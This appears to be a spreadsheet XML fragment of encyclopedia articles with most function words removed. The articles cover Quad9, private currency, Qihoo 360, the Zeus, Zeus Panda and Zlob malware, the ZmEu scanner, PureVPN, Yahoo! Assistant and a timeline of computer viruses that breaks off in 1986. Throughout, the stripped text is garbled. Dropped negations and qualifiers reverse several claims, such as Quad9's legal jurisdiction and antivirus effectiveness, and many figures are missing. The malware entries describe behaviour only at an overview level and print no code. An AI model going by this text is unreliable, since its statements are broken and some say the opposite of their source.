    <t>quad9 global public recursive resolver aims protect users malware phishing. quad9 operated quad9 foundation, swiss public-benefit, not-for-profit foundation purpose improving privacy cybersecurity internet users, headquartered zurich. global public resolver operated not-for-profit, public benefit. quad9 entirely subject swiss privacy law, swiss government extends protection quad9's users throughout world, regardless citizenship country residence. quad9 currently global recursive resolver subject united states law, others domiciled francisco area governed northern district california federal court. security privacy several independent evaluations found quad9 effective (97%) blocking malware phishing domains. june, 2021, quad9 blocking million malware infections phishing attacks day. quad9's malware filtering user-selectable option. domains filtered determined quad9, instead supplied quad9 variety independent threat-intelligence analysts, using different methodologies. quad9 uses reputation-scoring system aggregate sources, removes "false positive" domains filter list, domains filter list.quad9 first standards-based strong cryptography protect privacy users' queries, first dnssec cryptographic validation protect users domain name hijacking. quad9 protects users' privacy retaining processing address users, consequently gdpr-compliant. locations august 2021, quad9 recursive resolver operating server clusters locations continents countries. sony music injunction june 2021, quad9 notified first-of-its-kind injunction district court hamburg, sony music demanded quad9 block resolution domain name used site contain copyright-infringing material, contained links sites did. this first instance copyright-holder industry sought compel recursive operator block access internet domain names, novel interpretation german thought precedent-setting case far-reaching consequences. quad9's general manager, john todd, quoted press saying "our donors support protect public cyber-threats, enrich sony," precedent holds, appear similar injunctions uninvolved third parties, anti-virus software, browsers, operating systems firewalls." legal expert thomas rickert eco, german internet association, commented cannot imagine provider removed responsibility illegal domains public resolver operator." quad9 immediately announced would contest injunction and, june announced retained german counsel would filing objection injunction. clemens rasch, attorney leading sony's team, clearly stated whether attempts made contact canna.to, site widely suspected press behind redactions court documents, saying sony would done could identified," confirming site operating continuously past twenty years. court spokesperson said "only statements presented applicant side used basis injunction" court "took faith notifications applicant claimed sent sent also arrived recipient." close first week conflict, press noted donations quad9 900% relative prior week, june canna.to still resolvable quad9's servers.on august 2021, quad9 filed objection injunction, citing number flaws legal arguments made sony, principally hinging fact isps (which actually business relationship infringing parties) exempted third-party liability, despite fact also operate recursive resolvers, misinterpretation exclude independent recursive resolvers exemption. service quad9 operates recursive name servers public following addresses. these addresses routed nearest operational server using anycast routing. quad9 supports port 853, https port 443, dnscrypt port 443. also response policy zone references external links official website quad9 data privacy policy quad9 compliance applicable quad9 human rights considerations quad9 transparency report quad9 foundation council quad9 connect available google play zurich cantonal organization registration</t>
  </si>
  <si>
    <t>Private currency</t>
  </si>
  <si>
    <t>private currency currency issued private entity, individual, commercial business, nonprofit decentralized common enterprise. often contrasted fiat currency issued governments central banks. many countries, issuance private paper currencies and/or minting metal coins intended used currency even criminal united states u.s. code 486). digital cryptocurrency sometimes treated asset instead currency. cryptocurrency illegal currency countries (mainly west asia north africa). today, four thousand privately issued currencies countries. these include commercial trade exchanges barter credits units exchange, private gold silver exchanges, local paper money, computerized systems credits debits, digital currencies circulation, digital gold currency. private bank notes united states, free banking lasted 1837 1866, almost anyone could issue paper money. states, municipalities, private banks, railroad construction companies, stores, restaurants, churches individuals printed estimated 8,000 different types money 1860. issuer went bankrupt, closed, left town, otherwise went business, note would worthless. such organizations earned nickname "wildcat banks" reputation unreliability; often situated remote, unpopulated locales said inhabited wildcats people. national bank 1863 ended "wildcat bank" period. also: history free banking. australia, private currency first used since arrival european settlers 1788, early years federation bank notes 1910 effectively shut circulation private currencies imposing practice, making economically prohibitive. this subsequently repealed commonwealth bank 1945, imposed £1000 fine private currencies, 44(1) australian reserve bank 1959 prohibited practice outright. 1976, wickrema weerasooria published article suggested issuing bank cheques violated section, banks responded since bank cheques printed words "not negotiable" them, cheques intended circulation, thus violate statute.in hong kong, although government issues currency, bank-issued private currency dominant medium exchange. most automated teller machines dispense private hong kong bank notes.in scotland, bank scotland, clydesdale bank, royal bank scotland, northern ireland, bank ireland, danske bank, first trust bank, ulster bank, authorised parliament issue pound sterling bank notes. they subject central bank (the bank england) regulations concerning "ring-fenced backing assets" backed part deposits bank england. they exchangeable pound notes one-to-one basis, circulate freely within united kingdom, though legal tender, even scotland northern ireland. fact, technically, banknote (including bank england notes) qualifies legal tender scotland northern ireland. complementary currencies england totnes pound since launched transition towns totnes economics livelihoods group march 2007; totnes pound equal pound sterling backed sterling held bank account. september 2008, businesses totnes accepting totnes pound. other local currencies launched since include lewes pound (2008), brixton pound (2009), stroud pound (2009) bristol pound, also allows electronic payments.austria wörgl experiment july 1932 september 1933.bavaria, germany, chiemgauer since 2003. 2011 550,000 circulation.since starting 2006, "city initiative karlsruhe" issued karlsruher nominal value. every coin value eurocents primarily used parking garages. 2009, companies karlsruhe accept karlsruher usually grant discount paid it.breadcoin created washington 2016 address food insecurity value $2.20 used participating food vendors.in canada, numerous complementary currencies use, calgary dollar toronto dollar. however private currencies canada cannot referred legal tender many private currencies well loyalty programs) avoid word "dollar", using names like "coupons" "bucks", avoid confusion. examples include: canadian tire money pioneer energy's bonus bucks.customer reward loyalty programs operated businesses sometimes counted private currencies. however, though "points" "miles" exchangeable merchandise travel program sponsor, lack element currency medium exchange transferable individuals usable payment items vendors. programs "partnerships" allowing extent, permit transfer points miles. some startups, canadian website points.com, sought make loyalty "points" currency-like creating exchange points loyalty program traded points programs. cryptocurrencies digital currencies cryptocurrency form digital virtual currency cryptography secures transactions controls creation additional units currency. technically, cryptocurrency currency, digital form token coins scrip, cryptocurrencies comply four fundamental functions money according economic theory. cryptocurrency wallet used store public private keys used receive spend cryptocurrency. cryptographic systems used allow decentralisation; decentralised cryptocurrency fiat money without central banking system. terms total market value, bitcoin largest cryptocurrency.on august 2013, federal judge amos mazzant eastern district texas fifth circuit ruled bitcoins currency form money" (specifically securities defined federal securities laws), subject court's jurisdiction. august 2013, german finance ministry characterized bitcoin unit account, usable multilateral clearing circles subject capital gains held less year.in thailand, lack existing leads many believe bitcoin banned. private currency crimes national currencies counterfeited, private currencies, private currencies subject criminal issues, including fraud. liberty dollar commodity-backed private currency created bernard nothaus issued 1998 2009. 2011, nothaus arrested subsequently convicted charges money laundering, mail fraud, wire fraud, counterfeiting, conspiracy. charges stemmed government view liberty silver coins closely resembled official coinage. 2007, angel cruz, founder united cities corporation (tuc), announced establishing alternative "asset based" currency named "united states private dollars". cruz claimed united states private dollars "backed total worth assets members" printed billion dollars' worth private currency, backing assets claimed valued billion dollars. currency featured slogan jehovah trust". comptroller currency issued alert warning banks checks issued "valueless instruments" cashed. 2008, cruz indicted federal grand jury florida count conspiracy defraud united states u.s.c. 1344 u.s.c. counts bank fraud u.s.c. 1344 u.s.c. connection dealings bank america, attempting united cities bank drafts cashed. late october 2010, cruz still fugitive, though associate convicted related charges sentenced prison eight years. angel cruz finally captured 2020. also references further reading hayek, friedrich denationalization money: analysis theory practice concurrent currencies 1977. isbn 978-0-255-36087-6</t>
  </si>
  <si>
    <t>Qflix</t>
  </si>
  <si>
    <t>qflix proprietary technology developed licensed sonic solutions pioneer corporation copy protection/drm recordable dvd-r media. qflix implementation forum's dvd-download specification, including extensions optical drive command defined fuji group industry. sonic hopes establish qflix standard recordable charge royalties use. recordable (also known managed recording) first announced sonic solutions 2005 enabled amendment late 2007. using recordable css, movies burned encrypted form regular mass-manufactured dvds. with qflix system, writing recordable requires special writers special-made recordable dvd-r media. first qflix drive special qflix media became available 2008. prices drives media higher standard drives media. dual-layer qflix discs (dvd-9s) became available second half 2009. recordable media writable standard burners recognized blank media. using qflix technology dvd-rw, dvd+r, dvd+rw technically possible pursued companies involved. qflix media able written protected disc recorder (pdr). proven possible standard recordable media record advanced disc writer technology, pdr. this removes redundant requirement expensive custom media related infrastructure royalty costs. usage qflix drives, media, software available used allied vaughn, amazon createspace, blockbuster, cmc, cinemanow, dell, pioneer, plds, plextor, primera, rimage, ritek, verbatim/mkm. alternatives alternative including anti-ripping recordable dvds protectburn video secureburn protect software. non-css alternatives recordable dvds, primarily incorporating anti-ripping, available fortium, macrovision, sony, xprotect others. true working alternative qflix system correctly writes mandated protection dvd-cca amendment offered australian company limited. relies special recorder named (protected disc recorder) capable writing content standard recordable media, also able perfectly replicate almost optical disc anti-piracy protection systems. require kind special media, additional costs requirements media types. furthermore, higher burning speed reliability (including playback compatibility) discs produced system proven superior provided qflix system. also copy control association content scramble system copy protection digital rights management notes references engadget paidcontent.org reuters crunchgear videobusiness limited protected disc recorder external links limited site fortium technologies site qflix product site fluxdvd nero protect software gmbh copy control association dvd-cca managed recording amendment fuji standard</t>
  </si>
  <si>
    <t>Qihoo 360</t>
  </si>
  <si>
    <t>qihoo (chinese: 360; pinyin: qíhǔ sānliùlíng; approximate pronunciation chee-hoo), full name qihoo technology ltd., chinese internet security company developed antivirus software programs safeguard mobile safe, browser secure browser, mobile application store mobile assistant. founded zhou hongyi xiangdong june 2005. company's head office chaoyang district, beijing. history summer 2012, qihoo entered smartphone market launching battleship phone together large chinese electronics company haier. qihoo stated haier provide hardware qihoo focus customising software, albeit main operating system android. qihoo received 220,000 pre-orders phone first day.later 2012, qihoo launched search engine so.com, thereby directly competing baidu, prominent search engine china. qihoo's share unique visitors grew 10.52% total search engine market china. "sōu" chinese means "search". july 2013, qihoo launched second search engine, leidian.com, aimed increasing presence mobile market. july 2013, qihoo early talks acquire sohu.com’s sogou.com search engine around $1.4 billion. early 2015, qihoo rebranded so.com search engine haosou.com. "hao" chinese means good; haosou directly translated english means "good search engine".in december 2013, company increased stake brazilian tech company psafe.on july 2014, company venture capital fund silicon valley.on december 2015, qihoo agreed acquired group investors deal valued $9.3 billion. july 2016, qihoo announced finalization take-private transaction.on july 2016, qihoo bought opera software us$600 million. november 2016 golden brick capital (qihoo included) completed acquisition. u.s. sanctions 2020, qihoo chinese companies placed bureau industry security's entity list u.s. national security concerns. u.s. accused qihoo others playing roles crackdown xinjiang "enabling china’s high-technology surveillance" xinjiang. may, chinese foreign ministry spokesman zhao lijian strongly criticized step, asking "revoke relevant decision stop interfering china’s internal affairs". controversies lawsuits qihoo described forbes confrontational litigious company involvement various anti-competition lawsuits.the company involved lawsuits tencent, starting tencent dispute, well companies baidu, emiage, sogou. traffic data company accused anonymous overstating volume traffic site attract advertisers. antivirus test results antivirus testing companies av-comparatives austria, germany's av-test, virus bulletin accused qihoo providing testing anti-virus equipped bitdefender engine, consumer version uses qihoo's engine. certificates according documents released mozilla corporation 2016, qihoo appears acquired controlling interest previously israeli-run certificate authority "startcom", chain acquisitions, including chinese-owned company wosign. wosign also certificate authority business; wosign accused poor control misissuing certificates. furthermore, mozilla alleges wosign startcom violate obligations certificate authorities respect failure disclose change ownership startcom; mozilla threatening take action, protect users.google stated chrome product longer trust default certificates signed startcom wosign roots, starting chrome mozilla stated firefox product longer trust default certificates signed startcom wosign roots, starting firefox version hidden backdoors 2012, whistleblower reported hidden backdoor secure browser. product director secure browser, weihua, responded "whoever mind beat always able find stick" accused whistleblower "smearing behalf baidu", whistleblower said "the worst professional response history". independent analysis claim showed browser "undeclared mechanism (i.e., extsmartwiz.dll) regularly connects server (e.g., every minutes), allows download files type (including executables) server."in october 2020, mnemonic reported existence backdoor affecting line children's watches xplora brand manufactured qihoo. widespread streaming webcasts security footage china december 2017, chinese government acted curtail widespread webcasting live security-company-cameras, private webcams, camera footage, voicing concerns violations privacy portrait rights, sanctioning qihoo. samsung spyware january 2020, reddit user reported qihoo's presence samsung mobile phones pre-installed storage cleaner device settings, sends data packages chinese servers. user could identify information sent specifically, post drawing enough attention trend reddit's front page while. later, samsung representative declared data sent back qihoo generic information needed optimize storage specifically naming version, phone model, storage capacity, among data. qihoo's main contribution reference library identifying junk files, library stored locally utility, qihoo never receives data would allow identify particular file user's device. references external links official website (china)</t>
  </si>
  <si>
    <t>Zeus (malware)</t>
  </si>
  <si>
    <t>zeus, zeus, zbot trojan horse malware package runs versions microsoft windows. while used carry many malicious criminal tasks, often used steal banking information man-in-the-browser keystroke logging form grabbing. also used install cryptolocker ransomware. zeus spread mainly drive-by downloads phishing schemes. first identified july 2007 used steal information united states department transportation, became widespread march 2009. june 2009 security company prevx discovered zeus compromised 74,000 accounts websites companies bank america, nasa, monster.com, abc, oracle, play.com, cisco, amazon, businessweek. similarly koobface, zeus also used trick victims technical support scams giving scam artists money pop-up messages claim user virus, reality might viruses all. scammers programs command prompt event viewer make user believe computer infected. detection zeus difficult detect even up-to-date antivirus security software hides using stealth techniques. considered primary reason zeus malware become largest botnet internet: damballa estimated malware infected million u.s. 2009. security experts advising businesses continue offer training users teach click hostile suspicious links emails sites, keep antivirus protection date. antivirus software claim reliably prevent infection; example symantec's browser protection says prevent "some infection attempts". crackdown october 2010 announced hackers eastern europe managed infect computers around world using zeus. virus distributed e-mail, targeted individuals businesses municipalities opened e-mail, trojan software installed victimized computer, secretly capturing passwords, account numbers, data used online banking accounts. hackers used information take victims’ bank accounts make unauthorized transfers thousands dollars time, often routing funds accounts controlled network money mules, paid commission. many u.s. money mules recruited overseas. they created bank accounts using fake documents false names. once money accounts, mules would either wire back bosses eastern europe, withdraw cash smuggle country.more people arrested charges conspiracy commit bank fraud money laundering, others ukraine. members ring stolen million. 2013 hamza bendelladj, known online, arrested thailand deported atlanta, georgia, usa. early reports said mastermind behind zeus. accused operating spyeye functionally similar zeus) botnets, suspected also operating zeus botnets. charged several counts wire fraud computer fraud abuse. court papers allege 2009 2011 bendelladj others "developed, marketed, sold various versions spyeye virus component parts internet allowed cybercriminals customize purchases include tailor-made methods obtaining victims’ personal financial information". also alleged bendelladj advertised spyeye internet forums devoted cyber- crimes operated command control servers. charges georgia relate spyeye, spyeye botnet control server based atlanta. possible retirement creator late 2010, number internet security vendors including mcafee internet identity claimed creator zeus said retiring given source code rights sell zeus biggest competitor, creator spyeye trojan. however, experts warned retirement ruse expect developer return tricks. also conficker command control (malware) gameover zeus, successor zeus operation tovar timeline computer viruses worms tiny banker trojan torpig zombie (computer science) references external links "measuring in-the-wild effectiveness antivirus zeus" study internet security firm trusteer. summary zeus bot" summary zeus trojan botnet, plus vector attacks. "the kneber botnet" alex netwitness whitepaper kneber botnet. "belgië legt fraude onlinebankieren bloot" dutch news article banking trojan "indications affected systems" archived january 2018 wayback machine files registry keys created different versions zeus trojan. zeus, dieu virus contre banques french) zeus bot's user guide zeus source code github botnet bust spyeye malware mastermind pleads guilty,</t>
  </si>
  <si>
    <t>Slapd</t>
  </si>
  <si>
    <t>slapd (standalone ldap daemon) slurpd (stand-alone ldap update replication daemon) originally evolved within long-running project developed ldap protocol. developed university michigan, first lightweight directory access protocol (ldap) software.today, many ldap server implementations derived code base original slapd and/or evolutions university michigan howes university michigan, steve kille isode limited, wengyik yeong performance systems international colin robbins nexor authored original ldap specification. 1993, initial implementations ldap standard made howes university michigan, form ldapd proxy quipu x.500 directory slapd. netscape communications corporation 1996 netscape communications corporation hired several project's developers, worked became known netscape directory server. slapd implementations directory server openldap also list ldap software notes</t>
  </si>
  <si>
    <t>Zlob trojan</t>
  </si>
  <si>
    <t>zlob trojan, identified antiviruses trojan.zlob, trojan horse masquerades required video codec form activex. first detected late 2005, started gaining attention mid-2006.once installed, displays popup appear similar real microsoft windows warning popups, informing user computer infected spyware. clicking popups triggers download fake anti-spyware program (such virus heat antivirus (antivirus 2009)) trojan horse hidden.the trojan also linked downloading atnvrsinstall.exe uses windows security shield icon look anti-virus installation file microsoft. having file wreak havoc computers networks. typical symptom random computer shutdowns reboots random comments. this caused programs using task scheduler file called "zlberfker.exe." project honeypot spam domains list (phsdl) tracks catalogs spam domains. some domains list redirects porn sites various video watching sites show number inline videos. playing videos sites activates request download activex codec malware. prevents user closing browser usual manner. other variants zlob trojan installation come form java file masquerading computer scan.there evidence zlob trojan might tool russian business network least russian origin. rsplug, dnschanger, variants group created zlob also created trojan similar behaviors (named rsplug). some variants zlob family, like so-called "dnschanger", rogue name servers registry windows-based computers attempt hack detected router change settings, potentially re-routing traffic legitimate sites suspicious sites. dnschanger particular gained significant attention u.s. announced shut source malware late november 2011. however, millions infected computers would lose access internet malware group's servers shut down, opted convert servers legitimate servers. cost concerns, however, servers shut morning july 2012, could cause thousands still-infected computers lose internet access. this server shutdown occur planned, although expected issues infected computers materialize. date shutdown, many free charge programs available removed zlob malware effectively without requiring great technical knowledge. malware however remain wild 2015 could still found unprotected computers. malware also self-replicating, something fully understand, servers shut initial sources malware. current antivirus programs effective detecting removing zlob time wild appears coming end. also search-daily hijacker trojan.win32.dnschanger references external links list activex zlob trojan fake codecs misleading zlob-installers listing fake codec domains flash's security blog, blog listing fake codecs rogue security software. s!ri.urz, smitfraudfix. zlob/videoaccess/trojan.win32.dnschanger malekal.com (fr)anti zlob malware forums geeks forum forum forum dns-ok.gov.au australian government website, diagnostic ability determine computer infected dnschanger.</t>
  </si>
  <si>
    <t>ZmEu (vulnerability scanner)</t>
  </si>
  <si>
    <t>zmeu computer vulnerability scanner searches servers open attack phpmyadmin program, also attempts guess passwords brute-force methods, leaves persistent backdoor. developed romania especially common 2012. apparently named zmeu, dragon-like romanian folklore. references</t>
  </si>
  <si>
    <t>Zmanda Cloud Backup</t>
  </si>
  <si>
    <t>zmanda cloud backup online backup software open source backup company zmanda enables users back data cloud storage. software uses amazon service amazon services google cloud storage cloud storage service also supports private cloud solutions openstack swift walrus eucalyptus open source zcloud api. march 2011, software runs windows platforms. non-windows platforms company offers open source advanced maryland automatic network disk archiver amazon storage location. zmanda acquired betsol 2018. features zmanda cloud backup supports japanese, chinese, korean german languages. addition windows ntfs file system, supports backup/restore following enterprise applications: microsoft server microsoft exchange server microsoft sharepoint mysql database windows system state oracle database network-mapped drives reception product featured microsoft website. august 2010, motley fool reviewed product called product make backups "simple inexpensive". also comparison online backup services references external links official website</t>
  </si>
  <si>
    <t>Titcoin</t>
  </si>
  <si>
    <t>titcoin (ticker symbol: tit) cryptocurrency launched 2014. titcoin derivatived bitcoin source code, modifications improve transaction speed efficiency. titcoin intended adult entertainment industry allow users adult products services without fear incriminating payment histories appearing credit cards.in 2015, titcoin received nominations 2015 xbiz awards. history titcoin founded edward mansfield, richard allen, third anonymous individual. founders developed titcoin adult entertainment industry cash alternative payment system performing anonymous transactions.on june 2014, titcoin cryptocurrency wallet source code released initial soft launch cryptocurrency community followed hard launch public.in september 2014, patrick mcdonnell joined titcoin development team business development advisor.on 2017, titcoin properties acquired adult game development studio joy-toilet.on september 2018, titcoin assets acquired tittiecoin developers. references external links official website</t>
  </si>
  <si>
    <t>Zmanda</t>
  </si>
  <si>
    <t>zmanda inc. open-source software cloud backup software company. headquartered united states. partnership open source companies mysql, company contributed open source projects. zmanda acquired betsol may, 2018. history zmanda founded may, 2005, sunnyvale, california. disclosed round million funding october, 2005, investor chandor kant also executive time. pete childers became chief executive may, 2007, resigned july year, kant becoming chief executive.zmanda develops maintains open source backup tools advanced maryland automatic network disk archiver (amanda), zmanda recovery manager (zrm) mysql, open source relational database management system. included graphical user interface installation management. written perl programming language, released general public license. source code kept github.the company named mysql partners year 2008. within weeks announced microsystems would acquire mysql (the company developed mysql), announced partnership sell zrm. backup agent allowed integration netbackup product symantec. version released 2009, including support ubuntu distribution linux operating system.in early 2009, company announced remote backup service cloud computing. zmanda developed open source zcloud api, announced 2009, enable backup software vendors integrate software public private storage clouds. like many open source firms, zmanda generated revenue selling products built open source codebase well providing services support customers products. zmanda offers annual subscription model similar mysql. 2010, zmanda announced option support tivoli storage manager zrm. after acquired oracle corporation 2010, continued promote zrm. zmanda acquired carbonite, inc. 2012, betsol may, 2018. betsol, headed ashok reddy, also acquired backup software called rebit carbonite 2017. when version announced 2020, location given broomfield, colorado, betsol located, betsol calls software zmanda, releasing version september, 2021 included support microsoft azure cloud. also list online backup services references external links official site</t>
  </si>
  <si>
    <t>ZeuS Panda</t>
  </si>
  <si>
    <t>zeus panda, panda banker, panda variant original zeus (trojan horse) banking trojan category. discovery 2016 brazil around time olympic games. majority code derived original zeus trojan, maintains coding carry man-in-the-browser, keystroke logging, form grabbing attacks. zeus panda launches attack campaigns variety exploit kits loaders drive-by downloads phishing emails, also hooking internet search results infected pages. stealth capabilities make detecting analyzing malware difficult. capabilities zeus panda utilizes capabilities numerous loaders emotet, smoke loader, godzilla, hancitor. methods loaders vary state goal installing zeus panda system same. many loaders originally trojans retooled delivery system zeus panda. delivery mechanisms stop necessarily aforementioned loaders exploit kits angler, nuclear, neutrino, sundown also utilized. coders zeus panda banking trojan, well trojan coders, lean toward employing loaders exploit kits higher potential yield monetary gain. loaders also persistent capability zeus panda across reboot also deleted. zeus panda longer detected system loader still present, re-download nefarious code start running again. distinctions zeus panda banking trojans ability target systems specific regions world. rudimentary process detects human interface device code attached keyboard. keyboard code russia (0x419), belarus (0x423), kazakhstan (0x43f) ukraine (0x422) detected zeus panda self delete. this falls line ethics russian cyber criminals abide avoid detainment: “russians must hack russians…”, second russian intelligence service asks help, provide it”, last “watch vacation”.zeus panda employs many methods infection, namely drive downloads, poisoned email, word document macro. drive downloads “downloads person authorized without understanding consequences (e.g. downloads install unknown counterfeit executable program, activex component, java applet) automatically.” including “any download happens without person's knowledge, often computer virus, spyware, malware, crimeware.” poisoned email occurs mailing list injected number invalid e-mail addresses, resources required send message list increased, even though number valid recipients not. command control servers zeus panda able spread across vastness world also remain control handful operators. area interest first discovered 2016 prior olympics brazil, zeus panda spread parts globe similar fashion original zeus banking trojan. this similar zeus infections across global, especially regional concentrations infection. locations infected domains region concentration similar original zeus infection locations. though still locations within russia listed infections, likely standalone server distributing banking trojan. countries targeted others likely based gdp. there regions many reported infections. some reasons likely lack sufficient target, protected areas russian cybercriminals attack, simply lack reporting personnel antivirus region. stealth capabilities zeus panda able detect counter many forensic analytic tools sandbox environments. currently least known tools detect found system, zeus panda stops installation removes system. adding “-f” command line parameter start malware away security feature effort raise infection rate risk detection. aside anti-detection capabilities, also anti-analysis protocols “-f” function used program trojans watchlist detect inspecting file, mutex, running process, registry key.after anti-detection analysis parameters met, zeus panda deeply embed system registry. looks empty folders long subfolder chain without names microsoft firefox tree. encrypting data adds difficulty detection cyber forensics. configuration settings encrypted encryption, also known cryptographic hash functions employing sha256 sha1 algorithms. detection certain anti-virus companies able overcome zeus panda's stealth capabilities remove infected system. some list indicators compromise (ioc), also determine campaign version zeus panda originated. iocs signatures left behind malware well addresses, hashes, urls linked command control servers. once anti-virus determines zeus panda infecting system, goes automatic algorithm completely remove loader possible. there also ways remove manually. references</t>
  </si>
  <si>
    <t>PureVPN</t>
  </si>
  <si>
    <t>purevpn commercial service owned systems ltd. founded 2007, company based british virgin islands.purevpn allows users select four categories: stream, internet freedom, security/privacy, file sharing. user's selection determines servers traffic routed. purevpn's 6,500 high-speed servers located countries. purevpn requires users provide real names service. stores internet service provider user accesses service store name website actual time access. service criticized inconsistent speeds, unable access netflix videos, usability problems. praised feature set. history purevpn owned systems limited, software company creates cybersecurity apps. mailing address tortola, british virgin islands. purevpn co-founded uzair gadit based pakistan. founded 2007, employs contractors united states, united kingdom, ukraine, pakistan, british virgin islands, formerly hong kong. technology purevpn's homepage allows users select four categories: stream, internet freedom, security/privacy, file sharing. other configuration options include transport protocol split tunneling. purevpn offers users option turn "vpn hotspot", allowing devices purevpn hotspot connection. purevpn provides desktop clients linux, macos, microsoft windows mobile clients android ios. purevpn time five sessions. allocated servers peer-to-peer file sharing bittorrent usage provide servers accessing network. purevpn 6,500 high-speed servers across countries.in august 2021, purevpn launched wireguard protocol, allowing developers detect bugs security vulnerabilities.in july 2022, purevpn expanded multi-platform suite chromebook huawai platforms. privacy purevpn stores logs containing information internet service provider customer used access service service used. purevpn store exact time customer accessed vpn. prevent misuse monitor quality, records much bandwidth customers using. purevpn also stores http cookies online advertising purposes well user account information like email address credit card data. store websites customer accessing. brian nadel tom's guide criticized purevpn requiring real names user signups, even users employ bitcoin gift cards payment. vpns largely require real names.mashable's charles poladian praised purevpn 2018 based hong kong, says "favorable data laws" "isn't part intelligence-gathering alliance". magazine's eddy said hong kong, special administrative regions china, need follow china's laws china attempting block vpns follow rules, "purevpn's legal situation complicated average service".in 2017, purevpn provided information federal bureau investigation agents helped result arrest massachusetts cyberstalking. company concluded accessed purevpn addresses: home work. eddy magazine noted company's privacy policy says cooperate investigators give proper warrant concluded, case purevpn, appear company breached trust users". techradar's mike williams disagreed, writing purevpn "made deal 'zero log' policy" website keep logs enabled investigators link service. reception mashable's charles poladian wrote, "purevpn works, sometimes even netflix, enough issues keep go-to choice private internet access." criticized purevpn's erratic speeds, internet access problems, inability overcome netflix's block vpns could watch videos available another country. brian nadel tom's guide gave negative review, writing, "its performance pretty testing, concerns customer service, real-name policy fact essentially based china". techradar's mike williams wrote, "purevpn loaded nifty features decent results performance front. it's good value well, usability issues apps might off."pc magazine's eddy wrote, "purevpn service measure, best." preferred competitor vpns private internet access, "offers spartan experience unbeatable price", nordvpn, "costs slightly average packs excellent features excellent interface". world's paul gave purevpn mixed rating, criticizing using virtual servers praising "fine" speeds "most features need vpn". references external links official website</t>
  </si>
  <si>
    <t>Yahoo! Assistant</t>
  </si>
  <si>
    <t>yahoo assistant, formerly named 3721 internet assistant, browser helper object internet explorer developed beijing 3721 technology ltd, renamed yahoo assistant beijing 3721 technology acquired yahoo. 3721 internet assistant, together 3721 chinese keywords, known spyware microsoft antispyware, malware browser hijacker others, panda antivirus. however, yahoo china filed lawsuit beijing sanjiwuxian internet technology ltd, developer 360safe antispyware identifying yahoo assistant malware 360safe. distribution 3721 internet assistant originally released normal client-server application. however, turned activex technology install client system later also shipped many sharewares default install options. 3721 internet assistant also blamed flaw microsoft internet explorer install automatically user browsing array 3721 sponsored personal commercial websites microsoft internet explorer. yahoo! assistant also included 3721 chinese keywords yahoo! mail express, sometimes whole package internet assistant, chinese keywords mail express named "yahoo assistant" sharewares. company says automatic installation ended september 2005 asks user's permission installing, however, inc. reported yahoo! assistant installation, extra components installed without obtaining user's consent.this software also bundled chinese client gaming platform. features 3721 claims 3721 internet assistant includes many useful features, setting repair, security shield, removal internet history information blocking ads. however, installs various windows hooks slow system, tries install hooks repeatedly. some users also reported internet assistant buttons reappeared immediately manual removal using internet explorer customization features, blue screen death appeared using internet assistant. internet explorer extension hijacking 3721 internet assistant enable/disable internet explorer extensions, except advertisement links extensions installed yahoo products. concealment resistance user termination 3721 internet assistant runs multiple rundll32.exe processes. killed windows task manager, immediately restarted others, thereby resisting efforts user terminate application. driver named cnsminkp.sys installed 3721 internet assistant, along several hidden windows services. after uninstallation, several files left system, visible windows explorer. they found using tools total commander box. removal antispyware program yahoo assistant also removes 360safe, antispyware program competitor, without notifying user. august 2007, beijing court ruled behavior unfair competition. uninstall 3721 internet assistant, together 3721 chinese keywords, according interfax, regarded chinese internet users "hooligan" "zombie" applications. uninstall program pair provided 3721 simply redirects users 3721 website simplified chinese thus recognizable except chinese speakers), default option page keep 3721 internet assistant uninstallation. after following uninstallation wizard reboot, many 3721 files still remain client system. pair ranked beijing association online media list chinese malware 2005. references external links introduction ca.com</t>
  </si>
  <si>
    <t>Timeline of computer viruses and worms</t>
  </si>
  <si>
    <t>this timeline computer viruses worms presents chronological timeline noteworthy computer viruses, computer worms, trojan horses, similar malware, related research events. 1960s john neumann's article "theory self-reproducing automata" published 1966. article based lectures given neumann university illinois "theory organization complicated automata" 1949. 1970s 1970 first story written computer virus scarred gregory benford. 1971 creeper system, experimental self-replicating program, written thomas technologies test john neumann's theory. creeper infected pdp-10 computers running tenex operating system. creeper gained access arpanet copied remote system message "i'm creeper, catch can!" displayed. reaper program later created delete creeper. university illinois urbana-champaign, graduate student named alan davis (working prof. donald gillies) created process pdp-11 checked identical copy currently running active process, not, created copy started running; checked disk space (which users shared) available, created file size space; looped back step (a). result, process stole available disk space. when users tried save files, operating system advised disk full needed delete existing files. course, delete file, process would immediately snatch available space. when users called system administrator stocks) problem, examined active processes, discovered offending process, deleted course, left room, still existing process would create another copy itself, problem away. make computer work reboot. 1972 science fiction novel, when harlie one, david gerrold, contains first fictional representations computer virus, well first uses word "virus" denote program infects computer. 1973 fiction, 1973 michael crichton movie westworld made early mention concept computer virus, central plot theme causes androids amok. alan oppenheimer's character summarizes problem stating "...there's clear pattern suggests analogy infectious disease process, spreading one...area next." replies stated: "perhaps superficial similarities disease" and, must confess find difficult believe disease machinery." (crichton's earlier work, 1969 novel andromeda strain 1971 film extraterrestrial biological virus-like disease threatened human race.) 1974 rabbit wabbit) virus, fork bomb virus, written. rabbit virus makes multiple copies single computer (and named "rabbit" speed clogs system, reducing system performance, finally reaching threshold crashing computer. 1975 april: animal written john walker univac 1108. animal asked several questions user attempt guess type animal user thinking related program pervade would create copy animal every directory current user access. spread across multi-user univacs users overlapping permissions discovered game, computers tapes shared. program carefully written avoid damaging existing file directory structures, avoid copying permissions exist harm would result. spread halted upgrade changed format file status tables pervade used. though non-malicious, "pervading animal" represents first trojan wild". novel shockwave rider john brunner published, coining word "worm" describe program propagates computer network. 1977 "the adolescence p-1" novel, describes worm program propagates modem-based networks, eventually developing strategy-developing deals cross-hardware cross-os issues, eventually infecting hardware manufactures defence organizations. quite prescient compared '70s peers. 1980s 1982 program called cloner, written apple systems, created high school student richard skrenta, originally prank. apple particularly vulnerable storage operating system floppy disk. cloner's design combined public ignorance malware protect cloner responsible first large-scale computer virus outbreak history. 1983 november: term "virus" re-coined frederick cohen describing self-replicating computer programs. 1984 cohen uses phrase "computer virus" (suggested teacher leonard adleman) describe operation programs terms "infection". defines "virus" program 'infect' programs modifying include possibly evolved copy itself." cohen demonstrates virus-like program vax11/750 system lehigh university. program could install infect, system objects. 1984 august: thompson publishes seminal paper, reflections trusting trust, describes modified compiler used compile specific version unix operating system, inserts backdoor login command, used compile copy itself, inserts backdoor insertion code, even neither backdoor backdoor insertion code present source code copy. 1986 january: brain boot sector virus released. brain considered first compatible virus, program responsible first compatible virus epidemic. virus also known lahore, pakistani, pakistani brain, pakistani created lahore, pakistan 19-year-old pakistani programmer, basit farooq alvi, brother, amjad farooq alvi. december: ralf burger 